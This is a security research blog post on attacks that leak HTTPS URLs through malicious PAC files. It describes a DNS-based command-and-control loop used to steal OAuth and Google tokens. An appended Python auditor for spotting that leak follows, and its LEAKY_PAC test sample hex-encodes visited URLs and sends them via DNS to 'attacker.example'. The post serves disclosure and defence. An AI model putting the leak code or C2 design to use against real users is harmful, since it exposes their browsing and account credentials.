Attacks on HTTPS via malicious PAC files

In our last blog post, Sniffing HTTPS URLS with malicious PAC files, we described issues identified in the implementation of PAC files in various web browsers and operating systems. In this post we outline the risk of these issues, and proof of concept source for others to replicate this work.

By Alex Chapman and Paul Stone

10 Aug 2016

Presentation and Demonstrations

These materials were first presented at our DEF CON presentation Toxic Proxies - Bypassing HTTPS and VPNs to Pwn Your Online Identity at DEF CON 24.

In our talk, we demonstrated several different attacks that are possible as a result of the PAC HTTPS leak. These include:

  • Passively monitoring the user's encrypted search queries and visited websites
  • Actively probing social media sites to discover the user's online identities and other information
  • Forcing OAuth authentication requests and stealing the resulting tokens, taking control of several user accounts
  • Stealing Google SSO tokens to gain partial access to the user's photos, email, calendar, and location history
  • Stealing files from the user's Google Drive account.

We have released a video demonstrating these attacks on YouTube. Updated slides from our talk are also available.

Implementation

To demonstrate our attacks, we wrote a Python script that runs a combined web server and DNS server. The architecture creates a Command & Control (C2) loop between the attacker's server and the user's browser.

As shown in the architecture diagram above, there are two components on each side. On the attacker's side are a web server and a DNS server.

In the user's browser are both malicious JavaScript running on a web page (for example a fake captive portal page) and a separate malicious PAC script. These have different capabilities: the web page can fetch commands from the attacker's server, force third-party URLs to load, and control the PAC script (e.g. giving it rules about which URLs to block or leak). The PAC script encodes HTTPS URLs and command responses and leaks them to the attacker via DNS. The attack server can then use this data to make decisions and pass further instructions to the JavaScript in the user's browser.

We have released the source code for our demo server, which is available on GitHub.
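As an added defensive example (not code from this post or from the released demo server), the following Python audits a PAC script for the leak pattern described above, a DNS lookup whose name is built from the encoded `url` argument, and shows a path-stripping mitigation of the kind browser vendors applied; the two PAC samples and the `attacker.example` domain are constructed for the test.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# PAC helper functions that make the browser issue a DNS query.
DNS_HELPERS = ("dnsResolve", "isResolvable", "isInNet")
# JavaScript idioms typically used to turn a URL into DNS-label-safe text.
ENCODING_HINTS = ("charCodeAt", "toString(16)", "btoa(", "escape(", "encodeURIComponent(")


def call_arguments(script, name):
    """Yield the raw argument text of every call to `name` (handles nested parens)."""
    for m in re.finditer(r"\b" + re.escape(name) + r"\s*\(", script):
        depth, start = 1, m.end()
        for i in range(start, len(script)):
            depth += {"(": 1, ")": -1}.get(script[i], 0)
            if depth == 0:
                yield script[start:i]
                break


def audit_pac(script):
    """Return findings for the 'encode the URL, leak it via DNS' pattern."""
    findings = []
    for helper in DNS_HELPERS:
        for arg in call_arguments(script, helper):
            # A lookup name built from `url`, or from any concatenation, can carry
            # the full HTTPS path and query to whoever answers the DNS query.
            if re.search(r"\burl\b", arg) or "+" in arg:
                findings.append(f"{helper}() argument derived from script data: {arg.strip()}")
    if re.search(r"\burl\b", script) and any(h in script for h in ENCODING_HINTS):
        findings.append("url is transformed with an encoding idiom (charCodeAt/hex/base64)")
    return findings


def strip_url_for_pac(url):
    """Mitigation: hand a PAC script only scheme and host of HTTPS URLs."""
    p = urlsplit(url)
    if p.scheme == "https":
        return urlunsplit((p.scheme, p.netloc, "/", "", ""))
    return url


# Constructed samples: a typical corporate PAC, and one showing the leak pattern.
BENIGN_PAC = """function FindProxyForURL(url, host) {
  if (isInNet(dnsResolve(host), "10.0.0.0", "255.0.0.0")) return "DIRECT";
  return "PROXY proxy.example.test:8080";
}"""
LEAKY_PAC = """function FindProxyForURL(url, host) {
  var enc = "";
  for (var i = 0; i < url.length; i++) enc += url.charCodeAt(i).toString(16);
  dnsResolve(enc + ".attacker.example");
  return "DIRECT";
}"""
```

Running `audit_pac` over a fleet's WPAD/auto-config files is a cheap check; the benign sample yields no findings, the leaky one yields two.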

Contact and Follow-up

Alex and Paul both work in Context's Research team from their London office. See the contact page for how to get in touch.
